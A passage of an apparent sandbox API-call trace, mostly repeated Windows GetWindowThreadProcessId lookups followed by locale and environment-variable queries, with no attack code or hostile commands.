	[0632.020] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x318
	[0632.020] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xcac
	[0632.020] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x8bc
	[0632.020] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xf9c
	[0632.021] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xf48
	[0632.021] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe40
	[0632.021] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xecc
	[0632.021] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xeb8
	[0632.021] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe80
	[0632.021] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe98
	[0632.021] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe60
	[0632.021] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xee4
	[0632.021] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xf00
	[0632.021] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xdf0
	[0632.022] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe1c
	[0632.022] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xdd0
	[0632.022] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xd94
	[0632.022] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xd74
	[0632.022] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xd00
	[0632.022] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xcd8
	[0632.022] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xc84
	[0632.022] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xca4
	[0632.022] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xc64
	[0632.023] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xc24
	[0632.023] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xb84
	[0632.023] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xbac
	[0632.023] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x384
	[0632.023] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xab8
	[0632.023] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x33c
	[0632.023] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xa44
	[0632.023] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xa64
	[0632.023] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x8a8
	[0632.023] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xaf0
	[0632.024] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x88c
	[0632.024] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xb04
	[0632.024] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x910
	[0632.024] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x230
	[0632.024] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xac0
	[0632.024] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xab4
	[0632.024] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xaac
	[0632.024] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x3d0
	[0632.024] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x978
	[0632.024] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xa7c
	[0632.025] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x59c
	[0632.025] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xa88
	[0632.025] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xa6c
	[0632.025] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xa68
	[0632.025] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x9f8
	[0632.025] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xa04
	[0632.025] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x924
	[0632.025] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x8dc
	[0632.025] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x7dc
	[0632.025] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x768
	[0632.026] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x764
	[0632.026] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x820
	[0632.026] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x810
	[0632.026] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x794
	[0632.026] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x83c
	[0632.026] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x7ac
	[0632.026] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xb44
	[0632.026] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xb5c
	[0632.026] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x838
	[0632.026] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.027] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.027] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.027] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.027] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.027] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.027] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.027] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.027] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x818
	[0632.027] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x5b8
	[0632.027] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x494
	[0632.028] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1ec
	[0632.028] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x440
	[0632.028] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x7e8
	[0632.028] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x730
	[0632.028] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x2c8
	[0632.028] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x31c
	[0632.028] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x330
	[0632.028] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x128
	[0632.028] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x5c8
	[0632.028] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x6f8
	[0632.029] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x358
	[0632.029] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x73c
	[0632.029] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xb0
	[0632.029] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x250
	[0632.029] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x240
	[0632.029] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x790
	[0632.029] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x61c
	[0632.029] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x540
	[0632.029] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x538
	[0632.029] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x568
	[0632.030] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x538
	[0632.030] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x568
	[0632.030] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x538
	[0632.030] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x540
	[0632.030] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x540
	[0632.030] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x57c
	[0632.030] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x460
	[0632.030] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x554
	[0632.030] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.030] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x528
	[0632.031] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.031] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.031] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.031] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x79c
	[0632.031] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.031] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4e0
	[0632.031] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.031] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x460
	[0632.031] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x460
	[0632.032] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x44c
	[0632.032] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x778
	[0632.032] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x460
	[0632.032] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x558
	[0632.032] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.032] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0632.032] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1bb4
	[0632.032] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x10bc
	[0632.032] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1b50
	[0632.032] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x14b4
	[0632.033] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x149c
	[0632.033] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x14a8
	[0632.033] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1490
	[0632.033] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x14a4
	[0632.033] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x148c
	[0632.033] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1458
	[0632.033] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1b4c
	[0632.033] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1b3c
	[0632.033] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x19bc
	[0632.034] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x199c
	[0632.034] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1998
	[0632.034] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1994
	[0632.034] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1990
	[0632.034] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1984
	[0632.034] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x197c
	[0632.034] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1978
	[0632.034] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1824
	[0632.034] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1088
	[0632.034] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1908
	[0632.035] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x18cc
	[0632.035] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x18d0
	[0632.035] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1840
	[0632.035] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x10c4
	[0632.035] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x128c
	[0632.035] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x16e8
	[0632.035] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x16cc
	[0632.035] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x274
	[0632.035] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x10e0
	[0632.035] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x10cc
	[0632.036] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x10c0
	[0632.036] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x10d0
	[0632.036] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1198
	[0632.036] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1080
	[0632.036] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1074
	[0632.036] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x106c
	[0632.036] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1474
	[0632.036] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1414
	[0632.036] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xbd0
	[0632.036] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x550
	[0632.037] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xa38
	[0632.037] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x16d0
	[0632.037] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x16d4
	[0632.037] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x15bc
	[0632.037] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x15a0
	[0632.037] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x159c
	[0632.037] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1598
	[0632.037] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1594
	[0632.037] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1590
	[0632.038] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x158c
	[0632.038] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1588
	[0632.038] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1584
	[0632.038] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1580
	[0632.038] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x157c
	[0632.038] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1488
	[0632.038] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1404
	[0632.038] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x11b8
	[0632.038] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xbd4
	[0632.038] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe0c
	[0632.039] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xd30
	[0632.039] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe70
	[0632.039] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x13b8
	[0632.039] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe20
	[0632.039] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe2c
	[0632.039] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe00
	[0632.039] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe04
	[0632.039] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xc94
	[0632.039] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x13b0
	[0632.040] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x13ac
	[0632.040] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x13a8
	[0632.044] WerSetFlags () returned 0x0
	[0634.360] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0634.360] CoTaskMemFree (pv=0x0) 
	[0634.361] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18de68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18de60 | out: pulNumLanguages=0x18de68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18de60) returned 1
	[0634.361] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18de68, pwszLanguagesBuffer=0x2cd5738, pcchLanguagesBuffer=0x18de60 | out: pulNumLanguages=0x18de68, pwszLanguagesBuffer=0x2cd5738, pcchLanguagesBuffer=0x18de60) returned 1
	[0634.368] CoTaskMemAlloc (cb=0x24) returned 0x29ac90
	[0634.368] GetUserDefaultLocaleName (in: lpLocaleName=0x29ac90, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0634.368] CoTaskMemFree (pv=0x29ac90) 
	[0636.344] CoTaskMemAlloc (cb=0x104) returned 0x251b20
	[0636.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x251b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.344] CoTaskMemFree (pv=0x251b20) 
	[0636.347] CoTaskMemAlloc (cb=0x104) returned 0x251b20
	[0636.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x251b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.347] CoTaskMemFree (pv=0x251b20) 
	[0636.349] CoTaskMemAlloc (cb=0x104) returned 0x251b20
